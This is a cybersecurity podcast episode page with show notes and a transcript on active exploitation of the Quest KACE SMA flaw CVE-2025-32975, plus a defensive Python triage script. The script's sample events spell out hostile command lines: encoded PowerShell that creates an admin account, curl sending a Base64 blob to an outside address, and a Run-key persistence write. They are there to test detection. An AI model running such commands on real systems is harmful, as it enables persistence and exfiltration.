Quest KACE SMA Systems Hijacked via Max-Severity Exploit [Prime Cyber Insights]
Prime Cyber Insights


Episode E1267
March 24, 2026
01:22
Hosts: Neural Newscast
News
Quest KACE SMA
CVE-2025-32975
Arctic Wolf
Zombie ZIP
endpoint security
authentication bypass
Veeam security
Veritas backup
vulnerability management
PrimeCyberInsights


Episode Summary

This briefing examines the active exploitation of CVE-2025-32975, a maximum-severity authentication bypass vulnerability in Quest KACE Systems Management Appliances. Cybersecurity firm Arctic Wolf has observed threat actors weaponizing this flaw—which carries a CVSS score of 10.0—since the week of March 9, 2026. Despite Quest releasing a patch in May 2025, unpatched systems exposed to the internet are being targeted to gain administrative control and drop Base64-encoded payloads via curl. The attackers are leveraging runkbot.exe and PowerShell to maintain persistence, eventually moving laterally to domain controllers and backup infrastructure like Veeam and Veritas. We also discuss the emergence of the 'Zombie ZIP' method, which leverages archive structures to evade traditional antivirus detection. This episode provides practitioners with the technical indicators and mitigation steps necessary to secure endpoint management infrastructure against these evolving credential harvesting and remote execution tactics.
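The post-exploitation chain summarised above (runkbot.exe launching shells, curl carrying Base64 payloads, PowerShell creating accounts or editing the registry) is something a defender can triage from process-creation telemetry. The following is an added example written for this page, not code from Arctic Wolf, Quest or the podcast; the event field layout, the sample events and the hostnames are all constructed for illustration, and the 203.0.113.10 address is an RFC 5737 documentation address, not a real indicator.

```python
"""Triage constructed process-creation events for the post-exploitation
behaviour described in the briefing. Field names (host, parent, image,
cmdline) are an assumed layout for this example, not a KACE SMA log format."""
import base64
import re

# Account-creation and registry-modification commands associated with the
# persistence steps described in the briefing (lower-cased for matching).
SUSPICIOUS_CMDLETS = (
    "new-localuser", "add-localgroupmember", "net user", "net localgroup",
    "set-itemproperty", "new-itemproperty", "reg add",
)

# A run of 40+ Base64 characters is used as a cheap "encoded blob" marker.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
CURL_WORD = re.compile(r"\bcurl(?:\.exe)?\b")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")


def decode_encoded_powershell(cmdline: str) -> str:
    """Return the decoded -enc/-EncodedCommand argument (UTF-16LE), or ''."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def triage_event(ev: dict) -> list[str]:
    """Return the reasons an event is suspicious (empty list if nothing matched)."""
    reasons = []
    parent = ev.get("parent", "").lower()
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "")
    lowered = cmd.lower()

    # 1. runkbot.exe is a native SMA process; it spawning a shell is unusual.
    if parent == "runkbot.exe" and image in SHELLS:
        reasons.append("runkbot.exe spawned a shell")

    # 2. curl carrying a long Base64 blob matches the payload-drop step.
    if CURL_WORD.search(lowered) and B64_BLOB.search(cmd):
        reasons.append("curl invoked with a Base64-encoded payload")

    # 3. PowerShell (encoded or plain) that performs account or registry changes.
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(cmd).lower()
        text = decoded or lowered
        for cmdlet in SUSPICIOUS_CMDLETS:
            if cmdlet in text:
                tag = "(encoded) " if decoded else ""
                reasons.append(f"PowerShell {tag}runs {cmdlet}")
                break
    return reasons


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that raised at least one reason."""
    flagged = []
    for i, ev in enumerate(events):
        reasons = triage_event(ev)
        if reasons:
            flagged.append((i, reasons))
    return flagged


def _enc(script: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events for this example only.
SAMPLE_EVENTS = [
    {"host": "kace-sma-01", "parent": "services.exe", "image": "runkbot.exe",
     "cmdline": "runkbot.exe -s"},                                  # benign scheduled run
    {"host": "kace-sma-01", "parent": "runkbot.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "New-LocalUser -Name svc_kace2 -Password $p; "
         "Add-LocalGroupMember -Group Administrators -Member svc_kace2")},
    {"host": "kace-sma-01", "parent": "runkbot.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c curl -s -d " + base64.b64encode(
         b"stage2 placeholder payload bytes for this example only").decode()
         + " http://203.0.113.10/c"},
    {"host": "ws-042", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc " + _enc(
         "Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
         "-Name upd -Value C:\\Users\\Public\\u.exe")},
    {"host": "ws-042", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},                      # benign admin use
]

if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(SAMPLE_EVENTS[idx]["host"], idx, "; ".join(why))
```

The three checks are deliberately independent so a single event can carry more than one reason; in practice the parent/child rule is the highest-signal one on the appliance itself, while the encoded-PowerShell decode is what lets you see account creation and Run-key writes that a plain string match on the command line would miss.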


Show Notes

Cybersecurity practitioners are facing a surge in targeted attacks against Quest KACE Systems Management Appliances. This episode of Prime Cyber Insights breaks down the technical specifics of CVE-2025-32975, a CVSS 10.0 vulnerability being used to hijack administrative accounts. We analyze the specific tactics observed by Arctic Wolf, including the use of runkbot.exe for account creation and RDP targeting of backup servers. Beyond Quest, we cover the 'Zombie ZIP' evasion technique and recent Apple WebKit security updates to help you prioritize your remediation efforts this week.

Topics Covered

  • 🚨 Analysis of CVE-2025-32975 and the active hijacking of Quest KACE SMA systems.
  • 🛡️ Technical TTPs including runkbot.exe exploitation and Mimikatz credential harvesting.
  • 🌐 The risk of exposing management appliances to the public internet and patching lag.
  • 📦 Understanding the 'Zombie ZIP' method and how it bypasses traditional AV scanners.
  • 💻 Mandatory security updates for Apple WebKit and iPhone persistence threats.

Disclaimer: This briefing is for informational purposes and does not constitute professional security advice.

Neural Newscast is AI-assisted, human reviewed. View our AI Transparency Policy at NeuralNewscast.com.

Transcript

[00:00] Announcer: From Neural Newscast, this is Prime Cyber Insights, Intelligence for Defenders, Leaders, and Decision Makers.
[00:08] Aaron Cole: This is Prime Cyber Insights for March 23, 2026.
[00:16] Aaron Cole: We lead today with a critical warning for organizations running Quest KACE Systems Management Appliances.
[00:24] Aaron Cole: We are tracking a maximum-severity authentication bypass, CVE-2025-32975.
[00:31] Lauren Mitchell: This is not a theoretical risk.
[00:33] Lauren Mitchell: Arctic Wolf reports active exploitation in the wild as of this month.
[00:38] Aaron Cole: That is correct, Lauren.
[00:39] Aaron Cole: This flaw carries a perfect CVSS score of 10.0.
[00:45] Aaron Cole: Threat actors have been weaponizing it since the week of March 9th
[00:48] Aaron Cole: to impersonate legitimate users and take over administrative accounts
[00:52] Aaron Cole: without requiring credentials.
[00:55] Lauren Mitchell: What is striking here, Aaron, is the post-exploitation sequence.
[00:59] Lauren Mitchell: Once they have access, they're using curl to drop Base64-encoded payloads and runkbot.exe,
[01:07] Lauren Mitchell: a native SMA process, to create additional admin accounts.
[01:12] Lauren Mitchell: It is a highly effective way to hide in plain sight.
[01:15] Aaron Cole: The lateral movement is aggressive.
[01:18] Aaron Cole: They have been observed using Mimikatz for credential harvesting,
[01:22] Aaron Cole: and then moving via RDP to domain controllers and backup infrastructure like Veeam and Veritas.
[01:29] Aaron Cole: Losing control of your management appliance effectively hands over the keys to the entire environment.
[01:35] Lauren Mitchell: The most frustrating aspect for practitioners is the timeline.
[01:40] Lauren Mitchell: Quest released the patch for this in May 2025.
[01:44] Lauren Mitchell: We are nearly a year out, yet unpatched internet-exposed instances remain an open door for these attackers.
[01:51] Aaron Cole: It underscores the danger of "set it and forget it" for management appliances.
[01:56] Aaron Cole: Speaking of persistence, we are also tracking a new evasion technique called the Zombie ZIP method, reported by Malwarebytes.
[02:04] Aaron Cole: It allows malicious files to bypass antivirus scans by manipulating the archive structure.
[02:11] Lauren Mitchell: Exactly, Aaron. It is a reminder that detection tools are only as good as their ability to parse complex file types.
[02:19] Lauren Mitchell: We are also seeing Apple push out WebKit patches to address bugs that could allow malicious sites to access user data.
[02:27] Aaron Cole: For the Quest KACE systems, the mitigation is clear.
[02:32] Aaron Cole: Update to versions 13.0385, 14.1, 101 or higher immediately and ensure these appliances are never directly exposed to the Internet.
[02:44] Aaron Cole: Lauren, what are your thoughts on the broader implications?
[02:48] Lauren Mitchell: Visibility is paramount.
[02:50] Lauren Mitchell: If you are running KACE SMA, check your logs for unusual runkbot.exe activity or unexpected
[02:57] Lauren Mitchell: PowerShell registry modifications.
[02:59] Lauren Mitchell: Do not assume that because a patch is old, the threat has passed.
[03:04] Aaron Cole: That concludes our briefing for today.
[03:06] Aaron Cole: For more technical deep dives, visit pci.neuralnewscast.com.
[03:11] Lauren Mitchell: This program is for informational purposes.
[03:14] Lauren Mitchell: Always consult with your internal security team
[03:17] Lauren Mitchell: before making infrastructure changes.
[03:19] Lauren Mitchell: Neural Newscast is AI-assisted, human-reviewed.
[03:23] Lauren Mitchell: View our AI transparency policy at neuralnewscast.com.
[03:27] Lauren Mitchell: See you tomorrow.
[03:28] Announcer: This has been Prime Cyber Insights on Neural Newscast.
[03:32] Announcer: Intelligence for defenders, leaders, and decision makers.
